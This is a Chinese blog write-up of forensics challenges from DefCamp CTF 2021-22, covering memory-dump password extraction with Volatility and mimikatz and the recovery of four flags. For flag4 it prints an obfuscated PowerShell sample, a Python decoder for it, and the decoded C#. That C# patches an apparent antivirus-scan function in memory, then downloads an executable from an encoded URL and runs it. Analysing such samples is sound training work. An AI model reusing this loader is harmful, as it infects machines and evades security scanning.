0
点赞
收藏
分享

微信扫一扫

DefCampCTF2122取证

舍予兄 2022-02-20 阅读 82
安全

文章目录

This-file-hides-something:

这里推荐使用volatility的一个插件mimikatz,可用于提取密码。此题可用mimikatz直接解决。

python vol.py -f /home/wha1e/桌面/crashdump.elf --profile=Win7SP1x64 mimikatz

在这里插入图片描述

Ok

flag1

找到secret1.txt,利用题目给的wecracktheworlds进行AES解密,获取flag1
在这里插入图片描述

flag2

在桌面找到secret2.ps1.txt,解密获取flag2
在这里插入图片描述

flag3

直接在下载里面获取pass
在这里插入图片描述

flag4

解压示例五
在这里插入图片描述

powershell -WindowStyle Hidden 

function p152b 
{
param($ma865fa)
$d5726d='b5ce91';
$hd7a4='';
for ($i=0; $i -lt $ma865fa.length;$i+=2)
{
$s8f2e8=[convert]::ToByte($ma865fa.Substring($i,2),16);
$hd7a4+=[char]($s8f2e8 -bxor $d5726d[($i/2)%$d5726d.length]);
}
return $hd7a4;
}
$u9558a = '17 46 0a 0b 5e 11 31 4c 10 115c5c5940100c575642661a164d540f1b311057450b58064b705f1650110a49620747150c5a54110e1616505f0515301c4a4507584d215050055b0c164d58014658104a580c524336404216500e4b707e5940100c575642661a164d540f1b2d004d0a6f3f13105b5d0b56430655501146431c0a52540c183e7d5d0e7c0e155643161d410e5c430c500f560b134e700d114b48325a0a0b4d0c4072061169430d5622015d4307461047106c4245160755580115101158450b564300414507470d45705f1665171719530751075411780c4133114b110a5107015a1d1141110c5756424102000003551c583e7d5d0e7c0e155643161d410e5c430c500f560b134e15260b4d431b650c0c574542084347755e03512f0c5b4303471a47106c4245160755580115101158450b564300414507470d45705f166517171940550257570f191141110c57564246525d5d57511c583e7d5d0e7c0e155643161d410e5c430c500f560b134e15260b4d431b650c0c57455f17350c4b4517540f354b5e165000111b183f1513105b5d0b5643164d50165c00455c491650110b19530d5a0f455f025306524d705f16651717194b530d05565c544e602a0b4d61164743100a500300564919440b5b17455b5304515b49195e17414310505f1615190001545402054c026a26590f2c54410d47174d1b7a07470d005502501b070955134e15260b4d431b650c0c57455f173111557c0d4306285c5c0d471a4715113150172958421670111756435f5302094a544b6843164d50165c00455c491650110b19470d5c07454f06065000045c192b5b17354d43424701520d0253192a0b4d611647431c0e055a534f0c5745424c555c08535a1c58154c530e5c00454a4503410a0619580c4143090f095457504d104a2b5b17354d43424456515d06555643581940550257570f19120456575b19400550500100520500540e045705065000134b1c580c5f19130057010e0601085e2c57453241114b6354105a4a1e5e5e165a43095b5454545a51024c2b5b17354d43425202535a5254575e075c5506044b140c050602540615415300510711135006565d0801525655040c03520656070b00530556030c06520257521b184b0e0a031156030300060f535f082a0b4d6116474d3f5c430d1c180256450d150f075c07030c575e44642b5b17354d43425f545d5a045b084b30705f16651717100459400a0b4d11185402520b0c520e0a031110040652560819055455065a07001909520152570c4f55410552190c104d11185402520b184b4e040a4d5e425901000f505b0158187b4816503838195a0301515d010c19051b56081d524d050315011a0c531802780c4133114b11155052015f0c2f54111651500e1b2209555e017d2409565303594b56100a2f54111651500e1b200a49484a5e02510b095a1953494e54535105490a18594354015c5203504b0b5c46427c0d116945101d04040f520103014b6d5e2b5b17530d194b1e531d090153574a494e54535105490a18595901000f505b0159456e5400760f0c5c5f161511515d0655045e0b5c46426206077a5d0b500d11111859461717505f051510045a0301005a587c5f145c110a575c075b174b7e5416730c095d54106502115119275b150c4b5e0c58060b4d1f3145060650500e730c095d54101b2215495d0b560211505e0c710211581849173f394c0350045a000c13494552500b534a1757060c01535753551b18594757010e06531b270a4e5f0e5a02017f580e504b15080450574b470950560452520804520652000d55570653540952575056000805535752510901575757570953560453530d505703575608065354510109505702565d0d52570552070901401c4f1658525056565c100a32470c065c42116617044b452b5b050a19525656550601555f5b06121961105a00004a42314102174d780c530c4d4a500107005000185965110a5a5411464d364d5010414b060d5254565b01100a105017104b5f42055818494400590a0619421654170c5a111141110c5756424552500b534a461717505f051500010c55571c18164d430b5b04455155065100581b535756065c081359461717505f051512520e0550035e364d430b5b044b7c5c12411a5e5f5e101d0a0b4d110b08535e500d015156010c1f2e500d024d59595c48580b1819571a115c1100500701080c215a0d135c43161b370a7b4816504b065d0406004d364c531141110c57564a5c4f57101d53034a5e480655015153120c4a560b044b184a5706015d00426b430d5d550656384d501e501c4340195906510706177d075b0411516c4b0e1e175c4517470d45480655015153024c1f';
//string to byte dönüştürüyor
$u9558a2 = p152b($u9558a);


Add-Type -TypeDefinition $u9558a2;
[y3c69]::l686b3();

解密

def p152b(ma865fa):
    d5726d = 'b5ce91'
    hd7a4 = ''
    for i in range(0, len(ma865fa), 2):
        s8f2e8 = int(ma865fa[i: i+2], 16)
        hd7a4 += chr(s8f2e8 ^ (ord(d5726d[((i // 2) % 6)])))
    return hd7a4
u9558a = '17 46 0a 0b 5e 11 31 4c 10 115c5c5940100c575642661a164d540f1b311057450b58064b705f1650110a49620747150c5a54110e1616505f0515301c4a4507584d215050055b0c164d58014658104a580c524336404216500e4b707e5940100c575642661a164d540f1b2d004d0a6f3f13105b5d0b56430655501146431c0a52540c183e7d5d0e7c0e155643161d410e5c430c500f560b134e700d114b48325a0a0b4d0c4072061169430d5622015d4307461047106c4245160755580115101158450b564300414507470d45705f1665171719530751075411780c4133114b110a5107015a1d1141110c5756424102000003551c583e7d5d0e7c0e155643161d410e5c430c500f560b134e15260b4d431b650c0c574542084347755e03512f0c5b4303471a47106c4245160755580115101158450b564300414507470d45705f166517171940550257570f191141110c57564246525d5d57511c583e7d5d0e7c0e155643161d410e5c430c500f560b134e15260b4d431b650c0c57455f17350c4b4517540f354b5e165000111b183f1513105b5d0b5643164d50165c00455c491650110b19530d5a0f455f025306524d705f16651717194b530d05565c544e602a0b4d61164743100a500300564919440b5b17455b5304515b49195e17414310505f1615190001545402054c026a26590f2c54410d47174d1b7a07470d005502501b070955134e15260b4d431b650c0c57455f173111557c0d4306285c5c0d471a4715113150172958421670111756435f5302094a544b6843164d50165c00455c491650110b19470d5c07454f06065000045c192b5b17354d43424701520d0253192a0b4d611647431c0e055a534f0c5745424c555c08535a1c58154c530e5c00454a4503410a0619580c4143090f095457504d104a2b5b17354d43424456515d06555643581940550257570f19120456575b19400550500100520500540e045705065000134b1c580c5f19130057010e0601085e2c57453241114b6354105a4a1e5e5e165a43095b5454545a51024c2b5b17354d43425202535a5254575e075c5506044b140c050602540615415300510711135006565d0801525655040c03520656070b00530556030c06520257521b184b0e0a031156030300060f535f082a0b4d6116474d3f5c430d1c180256450d150f075c07030c575e44642b5b17354d43425f545d5a045b084b30705f16651717100459400a0b4d11185402520b0c520e0a031110040652560819055455065a07001909520152570c4f55410552190c104d11185402520b184b4e040a4d5e425901000f505b0158187b4816503838195a0301515d010c19051b56081d524d050315011a0c531802780c4133114b11155052015f0c2f54111651500e1b2209555e017d2409565303594b56100a2f54111651500e1b200a49484a5e02510b095a1953494e54535105490a18594354015c5203504b0b5c46427c0d116945101d04040f520103014b6d5e2b5b17530d194b1e531d090153574a494e54535105490a18595901000f505b0159456e5400760f0c5c5f161511515d0655045e0b5c46426206077a5d0b500d11111859461717505f051510045a0301005a587c5f145c110a575c075b174b7e5416730c095d54106502115119275b150c4b5e0c58060b4d1f3145060650500e730c095d54101b2215495d0b560211505e0c710211581849173f394c0350045a000c13494552500b534a1757060c01535753551b18594757010e06531b270a4e5f0e5a02017f580e504b15080450574b470950560452520804520652000d55570653540952575056000805535752510901575757570953560453530d505703575608065354510109505702565d0d52570552070901401c4f1658525056565c100a32470c065c42116617044b452b5b050a19525656550601555f5b06121961105a00004a42314102174d780c530c4d4a500107005000185965110a5a5411464d364d5010414b060d5254565b01100a105017104b5f42055818494400590a0619421654170c5a111141110c5756424552500b534a461717505f051500010c55571c18164d430b5b04455155065100581b535756065c081359461717505f051512520e0550035e364d430b5b044b7c5c12411a5e5f5e101d0a0b4d110b08535e500d015156010c1f2e500d024d59595c48580b1819571a115c1100500701080c215a0d135c43161b370a7b4816504b065d0406004d364c531141110c57564a5c4f57101d53034a5e480655015153120c4a560b044b184a5706015d00426b430d5d550656384d501e501c4340195906510706177d075b0411516c4b0e1e175c4517470d45480655015153024c1f'.replace(" ", "")
print(p152b(u9558a))

获取powershell

using System;using System.Runtime.InteropServices;using System.Diagnostics;using System.IO;using System.Net;
public class y3c69{[DllImport("kernel32",EntryPoint="GetProcAddress")] public static extern IntPtr bedd1(IntPtr hdddc,string tae927);[DllImport("kernel32", EntryPoint = "LoadLibrary")] public static extern IntPtr q77426(string s18df3);[DllImport("kernel32", EntryPoint="VirtualProtect")] public static extern bool f3131(IntPtr z18f3ee,UIntPtr u3aa55, uint bbfd8, out uint ze8e67f);[DllImport("Kernel32.dll", EntryPoint="RtlMoveMemory", SetLastError=false)] static extern void v7decae(IntPtr rb7431,IntPtr y748f,int y691b8);public static int l686b3(){IntPtr q54d77c = q77426(p152b("0358100c17550e59"));if(q54d77c==IntPtr.Zero){goto lbe6a94;}IntPtr ga6cc6b=bedd1(q54d77c,p152b("2358100c6a52035b21105f570747"));if(ga6cc6b==IntPtr.Zero){goto lbe6a94;}UIntPtr j78c59=(UIntPtr)5;uint zaa72=0;if(!f3131(ga6cc6b,j78c59,0x40,out zaa72)){goto lbe6a94;}Byte[] ka4288={0x31,0xff,0x90};IntPtr we1df=Marshal.AllocHGlobal(3);Marshal.Copy(ka4288,0,we1df,3);v7decae(new IntPtr(ga6cc6b.ToInt64()+0x001b),we1df,3);lbe6a94: WebClient r4d771=new WebClient();string sac2c59=Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData)+"\\u2219e5"+p152b("4c501b00");r4d771.DownloadFile(p152b("0a411715031e4d53010c5e5e141b14005b420b41064a5643171a2d0a57584c501b00"),sac2c59);ProcessStartInfo c4c6c8d=new ProcessStartInfo(sac2c59);Process.Start(c4c6c8d);return 0;}public static string p152b(string cd5d5){string hdddc="b5ce91";string q77426=String.Empty;for(int i=0;i<cd5d5.Length;i+=2){byte bedd1=Convert.ToByte(cd5d5.Substring(i,2),16);q77426+=(char)(bedd1 ^ hdddc[(i/2) % hdddc.Length]);}return q77426;}}

get flag4

后记

此次取证并不算难,但因为太菜做出来的时候flag早已经被队内师傅们秒了,不过也给自己添加了学习取证的信心。

举报

相关推荐

CTF取证总结(内存取证,磁盘取证)以及例题复现

取证ctfmisc内存取证磁盘取证编程语言

volatility取证

volatilityvol取证计算机取证安全工具安全技术网络/安全yyds干货盘点

LeetCode 2122. 还原原数组

算法数据结构贪心

【电子取证篇】汽车取证数据提取与汽车取证实例浅析(附标准下载)

.netcoremicrosoft

HDU 2122(最小生成树模板)

#includei++ios编程语言

volatility 内存取证

网络安全

jquery 数字向下取证

jQuery取整HTML前端开发

移动取证和 Android 安全

mysqladb数据库

Windows 取证之Jump Lists

javalinuxwindowspythongithubHarmonyOS后端开发

取证分析实践之Autopsy

文件系统序列号搜索Python后端开发
0 条评论